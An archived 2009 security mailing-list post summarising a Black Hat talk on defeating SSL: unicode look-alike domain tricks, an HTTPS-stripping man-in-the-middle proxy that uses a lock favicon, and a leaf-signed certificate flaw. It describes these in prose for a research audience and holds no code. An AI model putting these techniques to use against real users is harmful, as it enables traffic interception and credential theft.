Dailydave mailing list archives
SSL MITM fun.
From: Dave Aitel <dave () immunityinc com>
Date: Thu, 19 Feb 2009 12:07:22 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This is a good presentation. https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf Essentially he details 3 attacks (from what I can tell): 1. Register a .cn address and use unicode character for / and ? to have HTTPS://www.paypal.com/?domain.cn?<some args> validate 2. Force user to stay on HTTP by MITM proxy that does modifications to the data as it goes through. Send HTTPS to the server, and HTTP to the client. Use a Lock icon as your Faveicon to fool the user they are "secure" even though they see HTTP:// instead o HTTPS:// 3. Sign the leaf cert with your leaf cert. This abuses an implementation flaw in OpenSSL, etc. For bonus fun, he points out once again that Banks and lots of sites do their login pages in HTTP and not HTTPS. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJnZHKtehAhL0gheoRAgoXAJ9LOxBGvjPr+2wconQPP1UOpL64mQCdEqkI drFaFiCtCMsjl/E5FqQdX0w= =5evO -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- SSL MITM fun. Dave Aitel (Feb 19)
- Message not available
- SSL MITM fun. Dan Moniz (Feb 19)
- Re: SSL MITM fun. Alexander Sotirov (Feb 19)
- Re: SSL MITM fun. Dan Moniz (Feb 19)
- Re: SSL MITM fun. Chris Weber (Feb 20)
- Re: SSL MITM fun. Michal Zalewski (Feb 20)
- Re: SSL MITM fun. Alexander Sotirov (Feb 20)
- Re: SSL MITM fun. Michal Zalewski (Feb 20)
- Re: SSL MITM fun. Robert Święcki (Feb 20)
- Message not available
- Re: SSL MITM fun. Michal Zalewski (Feb 20)
- SSL MITM fun. Dan Moniz (Feb 19)
- Message not available
- Re: SSL MITM fun. Michal Zalewski (Feb 19)